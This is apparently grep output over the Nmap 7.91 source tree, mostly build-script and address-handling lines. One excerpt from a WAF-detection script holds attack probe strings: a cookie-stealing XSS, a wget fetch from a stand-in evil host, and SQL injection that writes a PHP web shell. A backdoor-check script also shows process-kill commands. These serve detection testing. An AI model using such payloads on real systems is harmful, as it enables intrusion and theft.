nmap-7.91+dfsg1/scripts/http-waf-fingerprint.nse-94-          bigip.detected = true
##############################################
nmap-7.91+dfsg1/scripts/irc-unrealircd-backdoor.nse-198-
nmap-7.91+dfsg1/scripts/irc-unrealircd-backdoor.nse:199:      local linux_kill = "kill `ps -e | grep ircd | awk '{ print $1 }'`"
nmap-7.91+dfsg1/scripts/irc-unrealircd-backdoor.nse-200-      local windows_kill = 'wmic process where "name like \'%ircd%\'" delete'
##############################################
nmap-7.91+dfsg1/scripts/targets-ipv6-multicast-slaac.nse-157-
nmap-7.91+dfsg1/scripts/targets-ipv6-multicast-slaac.nse:158:  probe.ip_bin_src = packet.mac_to_lladdr(src_mac)
nmap-7.91+dfsg1/scripts/targets-ipv6-multicast-slaac.nse-159-  probe.ip_bin_dst = dst_ip6
##############################################
nmap-7.91+dfsg1/scripts/ip-geolocation-maxmind.nse-503-  output_record_by_addr = function(self,addr)
nmap-7.91+dfsg1/scripts/ip-geolocation-maxmind.nse:504:    local loc = self:record_by_addr(addr)
nmap-7.91+dfsg1/scripts/ip-geolocation-maxmind.nse-505-    if not loc then return nil end
##############################################
nmap-7.91+dfsg1/scripts/ip-geolocation-maxmind.nse-626-
nmap-7.91+dfsg1/scripts/ip-geolocation-maxmind.nse:627:  return gi:output_record_by_addr(host.ip)
nmap-7.91+dfsg1/scripts/ip-geolocation-maxmind.nse-628-end
##############################################
nmap-7.91+dfsg1/scripts/ipv6-ra-flood.nse-157-    local src_mac = random_mac()
nmap-7.91+dfsg1/scripts/ipv6-ra-flood.nse:158:    local src_ip6_addr = packet.mac_to_lladdr(src_mac)
nmap-7.91+dfsg1/scripts/ipv6-ra-flood.nse-159-
##############################################
nmap-7.91+dfsg1/scripts/http-waf-detect.nse-66-                          "?p4yl04d=<img%20src='x'%20onerror=alert(document.cookie)%20/>", "?p4yl04d=wget%20http://ev1l.com/xpl01t.txt",
nmap-7.91+dfsg1/scripts/http-waf-detect.nse:67:                          "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php'--"}
nmap-7.91+dfsg1/scripts/http-waf-detect.nse-68-
##############################################
nmap-7.91+dfsg1/scripts/snmp-interfaces.nse-444--- @return formatted string suitable for printing
nmap-7.91+dfsg1/scripts/snmp-interfaces.nse:445:function get_mac_addr( mac )
nmap-7.91+dfsg1/scripts/snmp-interfaces.nse-446-  local catch = function() return end
##############################################
nmap-7.91+dfsg1/scripts/snmp-interfaces.nse-510-      if value and value:len() > 0 then
nmap-7.91+dfsg1/scripts/snmp-interfaces.nse:511:        item.phys_addr = get_mac_addr( value )
nmap-7.91+dfsg1/scripts/snmp-interfaces.nse-512-      end
##############################################
nmap-7.91+dfsg1/scripts/lltd-discovery.nse-67--- @return formatted string suitable for printing
nmap-7.91+dfsg1/scripts/lltd-discovery.nse:68:local function get_mac_addr( mac )
nmap-7.91+dfsg1/scripts/lltd-discovery.nse-69-  local catch = function() return end
##############################################
nmap-7.91+dfsg1/scripts/lltd-discovery.nse-135-        -- Host ID (MAC Address)
nmap-7.91+dfsg1/scripts/lltd-discovery.nse:136:        mac = get_mac_addr(v:sub(1,6))
nmap-7.91+dfsg1/scripts/lltd-discovery.nse-137-      elseif t == 0x08 then
##############################################
nmap-7.91+dfsg1/missing-145-         from any GNU archive site."
nmap-7.91+dfsg1/missing:146:    files=`sed -n 's/^[ ]*A[CM]_CONFIG_HEADER(\([^)]*\)).*/\1/p' ${configure_ac}`
nmap-7.91+dfsg1/missing-147-    test -z "$files" && files="config.h"
##############################################
nmap-7.91+dfsg1/missing-184-         proper tools for further handling them.
nmap-7.91+dfsg1/missing:185:         You can get \`$1' as part of \`Autoconf' from any GNU
nmap-7.91+dfsg1/missing-186-         archive site."
nmap-7.91+dfsg1/missing-187-
nmap-7.91+dfsg1/missing:188:    file=`echo "$*" | sed -n 's/.*--output[ =]*\([^ ]*\).*/\1/p'`
nmap-7.91+dfsg1/missing:189:    test -z "$file" && file=`echo "$*" | sed -n 's/.*-o[ ]*\([^ ]*\).*/\1/p'`
nmap-7.91+dfsg1/missing-190-    if test -f "$file"; then
##############################################
nmap-7.91+dfsg1/missing-213-	*.y)
nmap-7.91+dfsg1/missing:214:	    SRCFILE=`echo "$LASTARG" | sed 's/y$/c/'`
nmap-7.91+dfsg1/missing-215-	    if [ -f "$SRCFILE" ]; then
##############################################
nmap-7.91+dfsg1/missing-217-	    fi
nmap-7.91+dfsg1/missing:218:	    SRCFILE=`echo "$LASTARG" | sed 's/y$/h/'`
nmap-7.91+dfsg1/missing-219-	    if [ -f "$SRCFILE" ]; then
##############################################
nmap-7.91+dfsg1/missing-243-	*.l)
nmap-7.91+dfsg1/missing:244:	    SRCFILE=`echo "$LASTARG" | sed 's/l$/c/'`
nmap-7.91+dfsg1/missing-245-	    if [ -f "$SRCFILE" ]; then
##############################################
nmap-7.91+dfsg1/missing-267-
nmap-7.91+dfsg1/missing:268:    file=`echo "$*" | sed -n 's/.*-o \([^ ]*\).*/\1/p'`
nmap-7.91+dfsg1/missing-269-    if test -z "$file"; then
nmap-7.91+dfsg1/missing:270:	file=`echo "$*" | sed -n 's/.*--output=\([^ ]*\).*/\1/p'`
nmap-7.91+dfsg1/missing-271-    fi
##############################################
nmap-7.91+dfsg1/missing-293-         the \`GNU make' package.  Grab either from any GNU archive site."
nmap-7.91+dfsg1/missing:294:    file=`echo "$*" | sed -n 's/.*-o \([^ ]*\).*/\1/p'`
nmap-7.91+dfsg1/missing-295-    if test -z "$file"; then
nmap-7.91+dfsg1/missing:296:      file=`echo "$*" | sed 's/.* \([^ ]*\) *$/\1/'`
nmap-7.91+dfsg1/missing:297:      file=`sed -n '/^@setfilename/ { s/.* \([^ ]*\) *$/\1/; p; q; }' $file`
nmap-7.91+dfsg1/missing-298-    fi
##############################################
nmap-7.91+dfsg1/missing-321-	*o*)
nmap-7.91+dfsg1/missing:322:	    firstarg=`echo "$firstarg" | sed s/o//`
nmap-7.91+dfsg1/missing-323-	    tar "$firstarg" "$@" && exit 0
##############################################
nmap-7.91+dfsg1/missing-327-	*h*)
nmap-7.91+dfsg1/missing:328:	    firstarg=`echo "$firstarg" | sed s/h//`
nmap-7.91+dfsg1/missing-329-	    tar "$firstarg" "$@" && exit 0
##############################################
nmap-7.91+dfsg1/NmapOps.h-90-     failure */
nmap-7.91+dfsg1/NmapOps.h:91:  int SourceSockAddr(struct sockaddr_storage *ss, size_t *ss_len);
nmap-7.91+dfsg1/NmapOps.h-92-  /* Returns a const pointer to the source address if set, or NULL if unset. */
nmap-7.91+dfsg1/NmapOps.h:93:  const struct sockaddr_storage *SourceSockAddr() const;
nmap-7.91+dfsg1/NmapOps.h-94-  /* Note that it is OK to pass in a sockaddr_in or sockaddr_in6 casted
nmap-7.91+dfsg1/NmapOps.h-95-     to sockaddr_storage */
nmap-7.91+dfsg1/NmapOps.h:96:  void setSourceSockAddr(struct sockaddr_storage *ss, size_t ss_len);
nmap-7.91+dfsg1/NmapOps.h-97-
##############################################
nmap-7.91+dfsg1/TargetGroup.cc-128-  std::string str() const;
nmap-7.91+dfsg1/TargetGroup.cc:129:  void set_addr(const struct sockaddr_in *addr);
nmap-7.91+dfsg1/TargetGroup.cc-130-
##############################################
nmap-7.91+dfsg1/TargetGroup.cc-136-public:
nmap-7.91+dfsg1/TargetGroup.cc:137:  void set_addr(const struct sockaddr_in6 *addr);
nmap-7.91+dfsg1/TargetGroup.cc-138-
##############################################
nmap-7.91+dfsg1/TargetGroup.cc-280-    netblock_ipv6 = new NetBlockIPv6Netmask();
nmap-7.91+dfsg1/TargetGroup.cc:281:    netblock_ipv6->set_addr((struct sockaddr_in6 *) &ss);
nmap-7.91+dfsg1/TargetGroup.cc-282-    return netblock_ipv6;
##############################################
nmap-7.91+dfsg1/TargetGroup.cc-378-    if (o.resolve_all && !this->resolvedaddrs.empty() && current_addr != this->resolvedaddrs.end() && ++current_addr != this->resolvedaddrs.end()) {
nmap-7.91+dfsg1/TargetGroup.cc:379:      this->set_addr((struct sockaddr_in *) &*current_addr);
nmap-7.91+dfsg1/TargetGroup.cc-380-    }
##############################################
nmap-7.91+dfsg1/TargetGroup.cc-490-
nmap-7.91+dfsg1/TargetGroup.cc:491:void NetBlockIPv4Ranges::set_addr(const struct sockaddr_in *addr) {
nmap-7.91+dfsg1/TargetGroup.cc-492-  uint32_t ip;
##############################################
nmap-7.91+dfsg1/TargetGroup.cc-506-
nmap-7.91+dfsg1/TargetGroup.cc:507:void NetBlockIPv6Netmask::set_addr(const struct sockaddr_in6 *addr) {
nmap-7.91+dfsg1/TargetGroup.cc-508-  assert(addr->sin6_family == AF_INET6);
##############################################
nmap-7.91+dfsg1/TargetGroup.cc-539-    if (o.resolve_all && !this->resolvedaddrs.empty() && current_addr != this->resolvedaddrs.end() && ++current_addr != this->resolvedaddrs.end()) {
nmap-7.91+dfsg1/TargetGroup.cc:540:      this->set_addr((struct sockaddr_in6 *) &*current_addr);
nmap-7.91+dfsg1/TargetGroup.cc-541-    }
##############################################
nmap-7.91+dfsg1/TargetGroup.cc-715-    netblock_ranges = new NetBlockIPv4Ranges();
nmap-7.91+dfsg1/TargetGroup.cc:716:    netblock_ranges->set_addr((struct sockaddr_in *) &ss);
nmap-7.91+dfsg1/TargetGroup.cc-717-    netblock = netblock_ranges;
##############################################
nmap-7.91+dfsg1/TargetGroup.cc-721-    netblock_ipv6 = new NetBlockIPv6Netmask();
nmap-7.91+dfsg1/TargetGroup.cc:722:    netblock_ipv6->set_addr((struct sockaddr_in6 *) &ss);
nmap-7.91+dfsg1/TargetGroup.cc-723-    netblock = netblock_ipv6;
##############################################
nmap-7.91+dfsg1/config.sub-52-
nmap-7.91+dfsg1/config.sub:53:me=`echo "$0" | sed -e 's,.*/,,'`
nmap-7.91+dfsg1/config.sub-54-
##############################################
nmap-7.91+dfsg1/config.sub-115-# Here we must recognize all the valid KERNEL-OS combinations.
nmap-7.91+dfsg1/config.sub:116:maybe_os=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\2/'`
nmap-7.91+dfsg1/config.sub-117-case $maybe_os in
##############################################
nmap-7.91+dfsg1/config.sub-123-    os=-$maybe_os
nmap-7.91+dfsg1/config.sub:124:    basic_machine=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'`
nmap-7.91+dfsg1/config.sub-125-    ;;
##############################################
nmap-7.91+dfsg1/config.sub-127-    os=-linux-android
nmap-7.91+dfsg1/config.sub:128:    basic_machine=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'`-unknown
nmap-7.91+dfsg1/config.sub-129-    ;;
nmap-7.91+dfsg1/config.sub-130-  *)
nmap-7.91+dfsg1/config.sub:131:    basic_machine=`echo $1 | sed 's/-[^-]*$//'`
nmap-7.91+dfsg1/config.sub-132-    if [ $basic_machine != $1 ]
nmap-7.91+dfsg1/config.sub:133:    then os=`echo $1 | sed 's/.*-/-/'`
nmap-7.91+dfsg1/config.sub-134-    else os=; fi
##############################################
nmap-7.91+dfsg1/config.sub-181-		os=-sco5v6
nmap-7.91+dfsg1/config.sub:182:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-183-		;;
##############################################
nmap-7.91+dfsg1/config.sub-185-		os=-sco3.2v5
nmap-7.91+dfsg1/config.sub:186:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-187-		;;
##############################################
nmap-7.91+dfsg1/config.sub-189-		os=-sco3.2v4
nmap-7.91+dfsg1/config.sub:190:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-191-		;;
nmap-7.91+dfsg1/config.sub-192-	-sco3.2.[4-9]*)
nmap-7.91+dfsg1/config.sub:193:		os=`echo $os | sed -e 's/sco3.2./sco3.2v/'`
nmap-7.91+dfsg1/config.sub:194:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-195-		;;
##############################################
nmap-7.91+dfsg1/config.sub-197-		# Don't forget version if it is 3.2v4 or newer.
nmap-7.91+dfsg1/config.sub:198:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-199-		;;
##############################################
nmap-7.91+dfsg1/config.sub-201-		# Don't forget version if it is 3.2v4 or newer.
nmap-7.91+dfsg1/config.sub:202:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-203-		;;
##############################################
nmap-7.91+dfsg1/config.sub-205-		os=-sco3.2v2
nmap-7.91+dfsg1/config.sub:206:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-207-		;;
nmap-7.91+dfsg1/config.sub-208-	-udk*)
nmap-7.91+dfsg1/config.sub:209:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-210-		;;
##############################################
nmap-7.91+dfsg1/config.sub-212-		os=-isc2.2
nmap-7.91+dfsg1/config.sub:213:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-214-		;;
##############################################
nmap-7.91+dfsg1/config.sub-218-	-isc*)
nmap-7.91+dfsg1/config.sub:219:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-220-		;;
##############################################
nmap-7.91+dfsg1/config.sub-230-	-ptx*)
nmap-7.91+dfsg1/config.sub:231:		basic_machine=`echo $1 | sed -e 's/86-.*/86-sequent/'`
nmap-7.91+dfsg1/config.sub-232-		;;
nmap-7.91+dfsg1/config.sub-233-	-windowsnt*)
nmap-7.91+dfsg1/config.sub:234:		os=`echo $os | sed -e 's/windowsnt/winnt/'`
nmap-7.91+dfsg1/config.sub-235-		;;
##############################################
nmap-7.91+dfsg1/config.sub-366-	*-*-*)
nmap-7.91+dfsg1/config.sub:367:		echo Invalid configuration \`$1\': machine \`$basic_machine\' not recognized 1>&2
nmap-7.91+dfsg1/config.sub-368-		exit 1
##############################################
nmap-7.91+dfsg1/config.sub-491-	amd64-*)
nmap-7.91+dfsg1/config.sub:492:		basic_machine=x86_64-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-493-		;;
##############################################
nmap-7.91+dfsg1/config.sub-533-	blackfin-*)
nmap-7.91+dfsg1/config.sub:534:		basic_machine=bfin-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-535-		os=-linux
##############################################
nmap-7.91+dfsg1/config.sub-541-	c54x-*)
nmap-7.91+dfsg1/config.sub:542:		basic_machine=tic54x-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-543-		;;
nmap-7.91+dfsg1/config.sub-544-	c55x-*)
nmap-7.91+dfsg1/config.sub:545:		basic_machine=tic55x-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-546-		;;
nmap-7.91+dfsg1/config.sub-547-	c6x-*)
nmap-7.91+dfsg1/config.sub:548:		basic_machine=tic6x-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-549-		;;
##############################################
nmap-7.91+dfsg1/config.sub-744-	i*86v32)
nmap-7.91+dfsg1/config.sub:745:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-746-		os=-sysv32
##############################################
nmap-7.91+dfsg1/config.sub-748-	i*86v4*)
nmap-7.91+dfsg1/config.sub:749:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-750-		os=-sysv4
##############################################
nmap-7.91+dfsg1/config.sub-752-	i*86v)
nmap-7.91+dfsg1/config.sub:753:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-754-		os=-sysv
##############################################
nmap-7.91+dfsg1/config.sub-756-	i*86sol2)
nmap-7.91+dfsg1/config.sub:757:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/config.sub-758-		os=-solaris2
##############################################
nmap-7.91+dfsg1/config.sub-782-	leon-*|leon[3-9]-*)
nmap-7.91+dfsg1/config.sub:783:		basic_machine=sparc-`echo $basic_machine | sed 's/-.*//'`
nmap-7.91+dfsg1/config.sub-784-		;;
##############################################
nmap-7.91+dfsg1/config.sub-789-	m68knommu-*)
nmap-7.91+dfsg1/config.sub:790:		basic_machine=m68k-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-791-		os=-linux
##############################################
nmap-7.91+dfsg1/config.sub-826-	mips3*-*)
nmap-7.91+dfsg1/config.sub:827:		basic_machine=`echo $basic_machine | sed -e 's/mips3/mips64/'`
nmap-7.91+dfsg1/config.sub-828-		;;
nmap-7.91+dfsg1/config.sub-829-	mips3*)
nmap-7.91+dfsg1/config.sub:830:		basic_machine=`echo $basic_machine | sed -e 's/mips3/mips64/'`-unknown
nmap-7.91+dfsg1/config.sub-831-		;;
##############################################
nmap-7.91+dfsg1/config.sub-848-	ms1-*)
nmap-7.91+dfsg1/config.sub:849:		basic_machine=`echo $basic_machine | sed -e 's/ms1-/mt-/'`
nmap-7.91+dfsg1/config.sub-850-		;;
##############################################
nmap-7.91+dfsg1/config.sub-967-	parisc-*)
nmap-7.91+dfsg1/config.sub:968:		basic_machine=hppa-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-969-		os=-linux
##############################################
nmap-7.91+dfsg1/config.sub-983-	pc98-*)
nmap-7.91+dfsg1/config.sub:984:		basic_machine=i386-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-985-		;;
##############################################
nmap-7.91+dfsg1/config.sub-998-	pentium-* | p5-* | k5-* | k6-* | nexgen-* | viac3-*)
nmap-7.91+dfsg1/config.sub:999:		basic_machine=i586-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-1000-		;;
nmap-7.91+dfsg1/config.sub-1001-	pentiumpro-* | p6-* | 6x86-* | athlon-*)
nmap-7.91+dfsg1/config.sub:1002:		basic_machine=i686-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-1003-		;;
nmap-7.91+dfsg1/config.sub-1004-	pentiumii-* | pentium2-* | pentiumiii-* | pentium3-*)
nmap-7.91+dfsg1/config.sub:1005:		basic_machine=i686-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-1006-		;;
nmap-7.91+dfsg1/config.sub-1007-	pentium4-*)
nmap-7.91+dfsg1/config.sub:1008:		basic_machine=i786-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-1009-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1017-	ppc-* | ppcbe-*)
nmap-7.91+dfsg1/config.sub:1018:		basic_machine=powerpc-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-1019-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1023-	ppcle-* | powerpclittle-*)
nmap-7.91+dfsg1/config.sub:1024:		basic_machine=powerpcle-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-1025-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1027-		;;
nmap-7.91+dfsg1/config.sub:1028:	ppc64-*) basic_machine=powerpc64-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-1029-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1033-	ppc64le-* | powerpc64little-*)
nmap-7.91+dfsg1/config.sub:1034:		basic_machine=powerpc64le-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-1035-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1116-	strongarm-* | thumb-*)
nmap-7.91+dfsg1/config.sub:1117:		basic_machine=arm-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/config.sub-1118-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1246-	xscale-* | xscalee[bl]-*)
nmap-7.91+dfsg1/config.sub:1247:		basic_machine=`echo $basic_machine | sed 's/^xscale/arm/'`
nmap-7.91+dfsg1/config.sub-1248-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1323-	*)
nmap-7.91+dfsg1/config.sub:1324:		echo Invalid configuration \`$1\': machine \`$basic_machine\' not recognized 1>&2
nmap-7.91+dfsg1/config.sub-1325-		exit 1
##############################################
nmap-7.91+dfsg1/config.sub-1331-	*-digital*)
nmap-7.91+dfsg1/config.sub:1332:		basic_machine=`echo $basic_machine | sed 's/digital.*/dec/'`
nmap-7.91+dfsg1/config.sub-1333-		;;
nmap-7.91+dfsg1/config.sub-1334-	*-commodore*)
nmap-7.91+dfsg1/config.sub:1335:		basic_machine=`echo $basic_machine | sed 's/commodore.*/cbm/'`
nmap-7.91+dfsg1/config.sub-1336-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1352-	-solaris1 | -solaris1.*)
nmap-7.91+dfsg1/config.sub:1353:		os=`echo $os | sed -e 's|solaris1|sunos4|'`
nmap-7.91+dfsg1/config.sub-1354-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1364-	-gnu/linux*)
nmap-7.91+dfsg1/config.sub:1365:		os=`echo $os | sed -e 's|gnu/linux|linux-gnu|'`
nmap-7.91+dfsg1/config.sub-1366-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1410-	-nto*)
nmap-7.91+dfsg1/config.sub:1411:		os=`echo $os | sed -e 's|nto|nto-qnx|'`
nmap-7.91+dfsg1/config.sub-1412-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1417-	-mac*)
nmap-7.91+dfsg1/config.sub:1418:		os=`echo $os | sed -e 's|mac|macos|'`
nmap-7.91+dfsg1/config.sub-1419-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1423-	-linux*)
nmap-7.91+dfsg1/config.sub:1424:		os=`echo $os | sed -e 's|linux|linux-gnu|'`
nmap-7.91+dfsg1/config.sub-1425-		;;
nmap-7.91+dfsg1/config.sub-1426-	-sunos5*)
nmap-7.91+dfsg1/config.sub:1427:		os=`echo $os | sed -e 's|sunos5|solaris2|'`
nmap-7.91+dfsg1/config.sub-1428-		;;
nmap-7.91+dfsg1/config.sub-1429-	-sunos6*)
nmap-7.91+dfsg1/config.sub:1430:		os=`echo $os | sed -e 's|sunos6|solaris3|'`
nmap-7.91+dfsg1/config.sub-1431-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1478-	-sinix5.*)
nmap-7.91+dfsg1/config.sub:1479:		os=`echo $os | sed -e 's|sinix|sysv|'`
nmap-7.91+dfsg1/config.sub-1480-		;;
##############################################
nmap-7.91+dfsg1/config.sub-1531-		# Get rid of the `-' at the beginning of $os.
nmap-7.91+dfsg1/config.sub:1532:		os=`echo $os | sed 's/[^-]*-//'`
nmap-7.91+dfsg1/config.sub:1533:		echo Invalid configuration \`$1\': system \`$os\' not recognized 1>&2
nmap-7.91+dfsg1/config.sub-1534-		exit 1
##############################################
nmap-7.91+dfsg1/config.sub-1794-		esac
nmap-7.91+dfsg1/config.sub:1795:		basic_machine=`echo $basic_machine | sed "s/unknown/$vendor/"`
nmap-7.91+dfsg1/config.sub-1796-		;;
##############################################
nmap-7.91+dfsg1/Target.cc-208-     to the size of the sockaddr copied in. */
nmap-7.91+dfsg1/Target.cc:209:int Target::TargetSockAddr(struct sockaddr_storage *ss, size_t *ss_len) const {
nmap-7.91+dfsg1/Target.cc-210-  assert(ss);
##############################################
nmap-7.91+dfsg1/Target.cc-219-
nmap-7.91+dfsg1/Target.cc:220:const struct sockaddr_storage *Target::TargetSockAddr() const {
nmap-7.91+dfsg1/Target.cc-221-  return &targetsock;
##############################################
nmap-7.91+dfsg1/Target.cc-225-     to sockaddr_storage */
nmap-7.91+dfsg1/Target.cc:226:void Target::setTargetSockAddr(const struct sockaddr_storage *ss, size_t ss_len) {
nmap-7.91+dfsg1/Target.cc-227-
##############################################
nmap-7.91+dfsg1/Target.cc-268- /* The source address used to reach the target */
nmap-7.91+dfsg1/Target.cc:269:int Target::SourceSockAddr(struct sockaddr_storage *ss, size_t *ss_len) const {
nmap-7.91+dfsg1/Target.cc-270-  if (sourcesocklen <= 0)
##############################################
nmap-7.91+dfsg1/Target.cc-279-
nmap-7.91+dfsg1/Target.cc:280:const struct sockaddr_storage *Target::SourceSockAddr() const {
nmap-7.91+dfsg1/Target.cc-281-  return &sourcesock;
##############################################
nmap-7.91+dfsg1/Target.cc-285-     to sockaddr_storage */
nmap-7.91+dfsg1/Target.cc:286:void Target::setSourceSockAddr(const struct sockaddr_storage *ss, size_t ss_len) {
nmap-7.91+dfsg1/Target.cc-287-  assert(ss_len > 0 && ss_len <= sizeof(*ss));
##############################################
nmap-7.91+dfsg1/aclocal.m4-132-  AC_CACHE_CHECK([for $am_display_PYTHON version], [am_cv_python_version],
nmap-7.91+dfsg1/aclocal.m4:133:    [am_cv_python_version=`$PYTHON -c "import sys; sys.stdout.write(sys.version[[:3]])"`])
nmap-7.91+dfsg1/aclocal.m4-134-  AC_SUBST([PYTHON_VERSION], [$am_cv_python_version])
##############################################
nmap-7.91+dfsg1/aclocal.m4-147-  AC_CACHE_CHECK([for $am_display_PYTHON platform], [am_cv_python_platform],
nmap-7.91+dfsg1/aclocal.m4:148:    [am_cv_python_platform=`$PYTHON -c "import sys; sys.stdout.write(sys.platform)"`])
nmap-7.91+dfsg1/aclocal.m4-149-  AC_SUBST([PYTHON_PLATFORM], [$am_cv_python_platform])
##############################################
nmap-7.91+dfsg1/aclocal.m4-195-     $am_py_prefix*)
nmap-7.91+dfsg1/aclocal.m4:196:       am__strip_prefix=`echo "$am_py_prefix" | sed 's|.|.|g'`
nmap-7.91+dfsg1/aclocal.m4:197:       am_cv_python_pythondir=`echo "$am_cv_python_pythondir" | sed "s,^$am__strip_prefix,$PYTHON_PREFIX,"`
nmap-7.91+dfsg1/aclocal.m4-198-       ;;
##############################################
nmap-7.91+dfsg1/aclocal.m4-237-     $am_py_exec_prefix*)
nmap-7.91+dfsg1/aclocal.m4:238:       am__strip_prefix=`echo "$am_py_exec_prefix" | sed 's|.|.|g'`
nmap-7.91+dfsg1/aclocal.m4:239:       am_cv_python_pyexecdir=`echo "$am_cv_python_pyexecdir" | sed "s,^$am__strip_prefix,$PYTHON_EXEC_PREFIX,"`
nmap-7.91+dfsg1/aclocal.m4-240-       ;;
##############################################
nmap-7.91+dfsg1/scan_engine.cc-105-  const struct sockaddr_storage *lss, *rss;
nmap-7.91+dfsg1/scan_engine.cc:106:  lss = (lhs) ? lhs->target->TargetSockAddr() : ss;
nmap-7.91+dfsg1/scan_engine.cc:107:  rss = (rhs) ? rhs->target->TargetSockAddr() : ss;
nmap-7.91+dfsg1/scan_engine.cc-108-  return 0 > sockaddr_storage_cmp(lss, rss);
##############################################
nmap-7.91+dfsg1/ltmain.sh-161-  # Extract subdirectory from the argument.
nmap-7.91+dfsg1/ltmain.sh:162:  func_dirname_result=`$ECHO "X${1}" | $Xsed -e "$dirname"`
nmap-7.91+dfsg1/ltmain.sh-163-  if test "X$func_dirname_result" = "X${1}"; then
##############################################
nmap-7.91+dfsg1/ltmain.sh-167-  fi
nmap-7.91+dfsg1/ltmain.sh:168:  func_basename_result=`$ECHO "X${1}" | $Xsed -e "$basename"`
nmap-7.91+dfsg1/ltmain.sh-169-}
##############################################
nmap-7.91+dfsg1/ltmain.sh-193-     progdir=$func_dirname_result
nmap-7.91+dfsg1/ltmain.sh:194:     progdir=`cd "$progdir" && pwd`
nmap-7.91+dfsg1/ltmain.sh-195-     progpath="$progdir/$progname"
##############################################
nmap-7.91+dfsg1/ltmain.sh-221-# Since each input `\' is now two `\'s, look for any number of runs of
nmap-7.91+dfsg1/ltmain.sh:222:# four `\'s followed by two `\'s and then a '$'.  `\' that '$'.
nmap-7.91+dfsg1/ltmain.sh-223-bs='\\'
##############################################
nmap-7.91+dfsg1/ltmain.sh-328-        # ...otherwise throw away the child directory and loop
nmap-7.91+dfsg1/ltmain.sh:329:        my_directory_path=`$ECHO "X$my_directory_path" | $Xsed -e "$dirname"`
nmap-7.91+dfsg1/ltmain.sh-330-      done
nmap-7.91+dfsg1/ltmain.sh:331:      my_dir_list=`$ECHO "X$my_dir_list" | $Xsed -e 's,:*$,,'`
nmap-7.91+dfsg1/ltmain.sh-332-
##############################################
nmap-7.91+dfsg1/ltmain.sh-363-      # If mktemp works, use that first and foremost
nmap-7.91+dfsg1/ltmain.sh:364:      my_tmpdir=`mktemp -d "${my_template}-XXXXXXXX" 2>/dev/null`
nmap-7.91+dfsg1/ltmain.sh-365-
##############################################
nmap-7.91+dfsg1/ltmain.sh-394-      *[\\\`\"\$]*)
nmap-7.91+dfsg1/ltmain.sh:395:	func_quote_for_eval_unquoted_result=`$ECHO "X$1" | $Xsed -e "$sed_quote_subst"` ;;
nmap-7.91+dfsg1/ltmain.sh-396-      *)
##############################################
nmap-7.91+dfsg1/ltmain.sh-536-	s/\$with_gnu_ld/'"$with_gnu_ld"'/
nmap-7.91+dfsg1/ltmain.sh:537:	s/\$automake_version/'"`(automake --version) 2>/dev/null |$SED 1q`"'/
nmap-7.91+dfsg1/ltmain.sh:538:	s/\$autoconf_version/'"`(autoconf --version) 2>/dev/null |$SED 1q`"'/
nmap-7.91+dfsg1/ltmain.sh-539-	p
##############################################
